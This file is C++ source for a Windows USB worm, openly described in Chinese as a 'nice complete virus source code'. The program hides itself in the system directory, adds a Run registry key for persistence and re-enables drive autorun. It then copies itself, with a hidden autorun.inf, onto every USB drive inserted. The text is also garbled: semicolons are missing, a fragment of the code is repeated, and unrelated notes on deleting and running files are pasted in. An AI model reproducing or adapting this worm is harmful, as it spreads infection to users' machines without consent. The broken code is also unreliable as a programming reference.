#include <windows.h>
#include <Shlwapi.h>
#include <fstream.h>
#include <TlHelp32.h>
#include <Dbt.h>
#pragma comment(lib,"shlwapi.lib")
#define TIMER 1//计时器
//function
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM)//窗口过程
//获取盘符
TCHAR FirstDriveFromMask (ULONG unitmask)
//病毒从U盘启动时用到的函数
BOOL FileExist(TCHAR *path)//测试一个文件是否存在
BOOL GetSelfPath(TCHAR *path)//Get the virus's path
//BOOL FindU(TCHAR *u)//check whether u exist, u[2]
BOOL GetSysPath(TCHAR *path)//得到系统路径
BOOL CopyToSysAndSet(HWND hwnd)//复制自身到系统目录和设置
BOOL SetFileAttrib(TCHAR *path)//设置path所指文件的属性
BOOL RegAutoRun(TCHAR *path)//修改注册表,实现自启动
//从C盘启动时用到函数
BOOL CopyToUAndSet()//复制自己到U盘
BOOL CreateAutoRunFile(TCHAR *path)//在U盘下生成autorun.inf文件
BOOL FindSelf()//测试自己是否在已经执行了
//global variable
TCHAR szExePath[MAX_PATH]//the virus's path
TCHAR U[2]//保存U盘的盘符
TCHAR szSysPath[MAX_PATH]//system path
//constant
const TCHAR *szExeName="bbbbb.exe"
const TCHAR *szSysName="aaaaa.exe"
const TCHAR *szAutoRunFile="AutoRun.inf"
int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance,
PSTR szCmdLine, int iCmdShow)
{
static TCHAR szAppName[]=TEXT ("UUUUUU")
HWND hwnd
MSG msg
WNDCLASS wndclass
wndclass.style =0
wndclass.lpfnWndProc =WndProc
wndclass.cbClsExtra =0
wndclass.cbWndExtra =0
wndclass.hInstance =hInstance
wndclass.hIcon =0
wndclass.hCursor =0
wndclass.hbrBackground =0
wndclass.lpszMenuName =NULL
wndclass.lpszClassName =szAppName
if (!RegisterClass (&wndclass))
{
MessageBox (NULL,TEXT("Program requires Windows NT!"),
szAppName, MB_ICONERROR)
return 0
}
hwnd = CreateWindow (szAppName, NULL,
WS_DISABLED,
0, 0,
0, 0,
NULL, NULL, hInstance, NULL)
while (GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage (&msg)
DispatchMessage (&msg)
}
return msg.wParam
}
LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)
{
PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam
switch(wParam)
{
case DBT_DEVICEARRIVAL: //插入
if (lpdb ->dbch_devicetype == DBT_DEVTYP_VOLUME)
{
PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lpdb
U[0]=FirstDriveFromMask(lpdbv ->dbcv_unitmask)//得到u盘盘符
//MessageBox(0,U,"Notice!",MB_OK)
CopyToUAndSet()//拷到u盘
}
break
case DBT_DEVICEREMOVECOMPLETE: //设备删除
break
}
return LRESULT()
}
LRESULT CALLBACK WndProc (HWND hwnd, UINT message, WPARAM wParam,LPARAM lParam)
{
switch(message)
{
case WM_Create: //处理一些要下面要用到的全局变量
U[1]=':'
GetSysPath(szSysPath)//得到系统路径
SetTimer(hwnd,TIMER,5000,0)//启动计时器
GetSelfPath(szExePath)//得到自身的路径
return 0
case WM_TIMER: //timer message
if(szExePath[0]==szSysPath[0]) //如果是系统盘启动的
SendMessage(hwnd,WM_DEVICECHANGE,0,0)//检测有没有插入设备消息
else
{
CopyToSysAndSet(hwnd)//拷到系统盘并自启动
}
return 0
case WM_DEVICECHANGE:
OnDeviceChange(hwnd,wParam,lParam)
return 0
case WM_DESTROY:
KillTimer(hwnd,TIMER)
PostQuitMessage(0)
return 0
}
return DefWindowProc(hwnd, message, wParam, lParam)
}
TCHAR FirstDriveFromMask(ULONG unitmask)
{
char i
for (i = 0i <26++i)
{
if (unitmask &0x1)//看该驱动器的状态是否发生了变化
break
unitmask = unitmask >>1
}
return (i + 'A')
}
BOOL GetSelfPath(TCHAR *path)
{
if(GetModuleFileName(NULL,path,MAX_PATH))//得到程序自身的目录
{
return TRUE
}
else
return FALSE
}
BOOL GetSysPath(TCHAR *path)
{
return GetSystemDirectory(path,MAX_PATH)//得到系统路径
}
BOOL CopyToSysAndSet(HWND hwnd)
{
TCHAR szPath[MAX_PATH]
lstrcpy(szPath,szSysPath)
lstrcat(szPath,"\\")
lstrcat(szPath,szSysName)//得到复制到系统目录的完整目录
if(!FileExist(szPath))//检测系统目录是否已经存在复制的文件
{
CopyFile(szExePath,szPath,FALSE)
RegAutoRun(szPath)
return SetFileAttrib(szPath)
}
else
{
if(!FindSelf())//检测自己有没有运行
{
//MessageBox(0,szExePath,szPath,MB_OK)
WinExec(szPath,SW_HIDE)//没有就执行
SendMessage(hwnd,WM_CLOSE,0,0)//结束自己
}
}
return FALSE
}
BOOL FileExist(TCHAR *path)//检测PATH所指的路径的文件是否存在
{
int result
result=PathFileExists(path)
if(result==1)
return TRUE
else
return FALSE
}
BOOL SetFileAttrib(TCHAR *path)
{
return SetFileAttributes(path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN)
}
BOOL RegAutoRun(TCHAR *path)//修改注册表实现自启动
{
HKEY hkey
DWORD v=0
RegOpenKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",&hkey)
RegSetValueEx(hkey,"NoDriveTypeAutoRun",0,REG_DWORD,(LPBYTE)&v,sizeof(DWORD))
if(RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Run",
&hkey)==ERROR_SUCCESS)
{
RegSetValueEx(hkey,szSysName,0,REG_SZ,(BYTE*)path,lstrlen(path))
RegCloseKey(hkey)
return TRUE
}
else
return FALSE
}
BOOL CopyToUAndSet()
{
TCHAR szPath[MAX_PATH]
lstrcpy(szPath,U)
lstrcat(szPath,"\\")
lstrcat(szPath,szExeName)//得到指向U盘的完整目录
TCHAR szAutoFile[MAX_PATH]
lstrcpy(szAutoFile,U)
lstrcat(szAutoFile,"\\")
lstrcat(szAutoFile,szAutoRunFile)
if(!FileExist(szAutoFile))
{
CreateAutoRunFile(szAutoFile)
SetFileAttrib(szAutoFile)
}
if(!FileExist(szPath))
{
CopyFile(szExePath,szPath,FALSE)
return SetFileAttrib(szPath)
}
return FALSE
}
BOOL CreateAutoRunFile(TCHAR *path) //在U盘下创建一个autorun.inf文件
{
ofstream fout
fout.open(path)
if(fout)
{
fout<<"[AutoRun]"<<endl
fout<<"open="<<szExeName<<" e"<<endl
fout<<"shellexecute="<<szExeName<<" e"<<endl
fout<<"shell\\Auto\\command="<<szExeName<<" e"<<endl
fout<<"shell=Auto"<<endl
fout.close()
return TRUE
}
return FALSE
}
BOOL FindSelf(){
PROCESSENTRY32 pe
HANDLE hShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0)
pe.dwSize=sizeof(PROCESSENTRY32)
if(Process32First(hShot,&pe)){
do{
if(lstrcmp(pe.szExeFile,szSysName)==0)
{
CloseHandle(hShot)
return TRUE
}
}while(Process32Next(hShot,&pe))
}
CloseHandle(hShot)
return FALSE
}隐藏窗口:ShowWindow(false)(#include <windows.h>)
将程序暂停一秒后继续执行:sleep(1000)(同上)
删除文件:system("del 文件的路径")
运行文件:system("文件的路径")
system函数(#include <iostream>)
复制文件:详见remove函数(#include <process.h>)
-----------------------------------------------------------
一个不错的病毒完整源代码
#include <windows.h>
#include <Shlwapi.h>
#include <fstream.h>
#include <TlHelp32.h>
#include <Dbt.h>
#pragma comment(lib,"shlwapi.lib")
#define TIMER 1//计时器
//function
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM)//窗口过程
//获取盘符
TCHAR FirstDriveFromMask (ULONG unitmask)
